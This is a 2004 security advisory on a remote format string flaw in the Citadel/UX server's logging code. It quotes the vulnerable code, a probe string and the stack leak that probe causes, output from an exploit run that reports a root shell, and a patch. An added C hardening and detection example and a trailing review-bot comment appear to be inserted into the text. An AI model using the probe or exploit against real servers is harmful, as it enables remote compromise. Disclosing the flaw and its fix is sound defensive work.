-------------------------------------------------
No System Group - Advisory #09 - 12/12/04
-------------------------------------------------

Program: Citadel/UX
Homepage: http://www.citadel.org
Operating System: Linux and Unix-Compatible
Vulnerable Versions: Citadel/UX v6.27 and prior
Risk: High
Impact: Remote Format String Vulnerability

-------------------------------------------------
- DESCRIPTION
-------------------------------------------------

Citadel/UX is an advanced client/server messaging and collaboration system for BBS and groupware applications. Users can connect to Citadel/UX using any telnet, WWW, or client software. Among the features supported are public and private message bases (rooms), electronic mail, real-time chat, paging, etc. The server is multithreaded and can easily support a large number of concurrent users. In addition, SMTP, IMAP, and POP3 servers are built in for easy connection to Internet mail. Citadel/UX is both robust and mature, having been developed over the course of the past thirteen years.

More information at: http://www.citadel.org

-------------------------------------------------
- DETAILS
-------------------------------------------------

A format string bug exists in the lprintf() function of sysdep.c: the buffer holding the formatted log message, which includes client-supplied text, is passed to syslog() as its format argument instead of as a parameter. This can cause a denial of service or give a remote shell with the privileges of the Citadel/UX process.

---------- sysdep.c ----------
108: void lprintf(enum LogLevel loglevel, const char *format, ...) {
109:         va_list arg_ptr;
110:         char buf[SIZ];
111:
112:         va_start(arg_ptr, format);
113:         vsnprintf(buf, sizeof(buf), format, arg_ptr);
114:         va_end(arg_ptr);
115:
116:         if (syslog_facility >= 0) {
117:                 if (loglevel <= verbosity) {
118:                         /* Hackery -IO */
119:                         if (CC && CC->cs_pid) {
120:                                 memmove(buf + 6, buf, sizeof(buf) - 6);
121:                                 snprintf(buf, 6, "[%3d]", CC->cs_pid);
122:                                 buf[5] = ' ';
123:                         }
124:                         syslog(loglevel, buf);   // <-- the format bug
125:                 }
126:         }
---------- sysdep.c ----------

Now we proceed to see what happens.
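Before following the session below, here is an added example (not Citadel/UX code) of what the lprintf() excerpt above should look like once the caller-supplied text is kept out of the format position, plus the check a defender can run on incoming text before it reaches a logger. The function names build_log_line() and count_conversions(), the 256-byte message buffer and the probe string "AAAA%x" are assumptions of this example, not part of the advisory.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Citadel/UX code. It mirrors the shape of lprintf()
 * from the advisory but guarantees that the only format strings reaching
 * a printf-family sink are literals written by the programmer. */

/* Count printf conversion directives in a string; "%%" is a literal percent
 * and a lone trailing '%' is ignored. A non-zero count on text that arrived
 * from the network (a command line, a user name) is a cheap detection signal
 * that the text is being probed as a format string, as with "AAAA%x". */
int count_conversions(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent: skip both characters */
            s++;
            continue;
        }
        if (s[1] == '\0')       /* dangling '%' at end of string */
            break;
        n++;
    }
    return n;
}

/* Hardened stand-in for sysdep.c lines 119-124: the "[pid] message" line is
 * built with one literal format, so the message is consumed by a %s and is
 * never interpreted. Returns what snprintf returns (the length the full line
 * would have had), so a caller can detect truncation. The attribute lets
 * GCC/Clang check call sites the way they check printf(). */
#if defined(__GNUC__)
__attribute__((format(printf, 4, 5)))
#endif
int build_log_line(char *out, size_t outsz, int pid, const char *fmt, ...)
{
    char msg[256];              /* assumed size; SIZ in the original */
    va_list ap;

    va_start(ap, fmt);
    vsnprintf(msg, sizeof msg, fmt, ap);   /* fmt is a literal from the caller */
    va_end(ap);

    if (pid > 0)
        return snprintf(out, outsz, "[%3d] %s", pid, msg);
    return snprintf(out, outsz, "%s", msg);
}

/* Returns 1 when the advisory's probe survives logging as literal text,
 * i.e. the "%x" is written out verbatim instead of reading the stack. */
int probe_is_logged_literally(void)
{
    char line[300];
    int n = build_log_line(line, sizeof line, 1, "Citadel: %s", "AAAA%x");
    return n == (int)strlen(line) && strcmp(line, "[  1] Citadel: AAAA%x") == 0;
}

int main(void)
{
    const char *probe = "AAAA%x";   /* constructed: the advisory's test input */
    char line[300];

    build_log_line(line, sizeof line, 1, "Citadel: %s", probe);
    printf("%s\n", line);
    printf("conversion directives in client input: %d\n",
           count_conversions(probe));
    return 0;
}
```

With the hardened wrapper the log line reads "[  1] Citadel: AAAA%x" rather than the "AAAA8090fe0" shown in the session below, and count_conversions() on the same input returns 1, which is the value a server could alert on or rate-limit before any logging takes place.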
coki@nosystem:~/audit$ telnet localhost 504
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
200 nosystem Citadel server ready.
AAAA%x
530 Unrecognized or unsupported command.
quit
200 Goodbye.
Connection closed by foreign host.
coki@nosystem:~/audit$

We connect to the Citadel/UX server on port 504 and send a test string.

coki@nosystem:~/audit$ tail -n 5 /var/log/messages
Dec 12 11:08:18 nosystem citadel[1305]: Database log file cull ended.
Dec 12 11:08:19 nosystem citadel[1303]: [  1] Session started.
Dec 12 11:08:33 nosystem citadel[1303]: [  1] Citadel: AAAA8090fe0
Dec 12 11:08:35 nosystem citadel[1303]: [  1] Citadel: quit
Dec 12 11:08:35 nosystem citadel[1303]: [  1] Session ended.
coki@nosystem:~/audit$

By sending a malicious format string we can see part of the stack: the probe AAAA%x is logged as AAAA8090fe0, the %x having been expanded by syslog().

-------------------------------------------------
- EXPLOIT
-------------------------------------------------

I have written an exploit that uses this format bug to obtain a remote shell on a target.

http://www.nosystem.com.ar/exploits/citadel_fsexp.c

coki@servidor:~$ make citadel_fsexp

coki@nosystem:~/audit$ ./citadel_fsexp -h localhost -t0

Citadel/UX v6.27 remote format string exploit
by CoKi

[*] host               : localhost
[*] system             : Slackware Linux 10.0
[*] syslog GOT address : 0x0809e9e8
[*] RET address        : 0xbfffd5fa

[+] verifying host... OK
[+] conecting... OK
[+] building evil buffer... OK
[+] sending evil buffer... OK
[+] waiting for shell...
[+] connecting to shell... OK
[!] you have a shell :)

Linux nosystem 2.4.26 #29 Mon Jun 14 19:22:30 PDT 2004 i686 unknown unknown GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)

-------------------------------------------------
- SOLUTIONS
-------------------------------------------------

The patch is included here:

--- sysdep.c    2004-11-03 17:19:00.000000000 -0300
+++ sysdep.c    2004-12-12 13:14:12.000000000 -0300
@@ -121,7 +121,7 @@
                                 snprintf(buf, 6, "[%3d]", CC->cs_pid);
                                 buf[5] = ' ';
                         }
-                        syslog(loglevel, buf);
+                        syslog(loglevel, "%s", buf);
                 }
         }
         else if (loglevel <= verbosity) {

-------------------------------------------------
- REFERENCES
-------------------------------------------------

http://www.nosystem.com.ar/advisories/advisory-09.txt

-------------------------------------------------
- CREDITS
-------------------------------------------------

Discovered by CoKi
No System Group - http://www.nosystem.com.ar
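Review bot: the `+ syslog(loglevel, "%s", buf);` line is the correct fix for the syslog path, but the hunk's trailing context `else if (loglevel <= verbosity) {` shows a second output branch of lprintf() whose body is not in the patch; if that branch also hands buf to a printf-family function as its format, it needs the same `"%s"` treatment, so the change should be reviewed against the whole of lprintf() rather than the syslog call alone. A quick way to confirm nothing else was missed is to build the tree with gcc's -Wformat-security, which warns on every call that passes a non-literal format with no further arguments, exactly the shape of the removed `- syslog(loglevel, buf);` line.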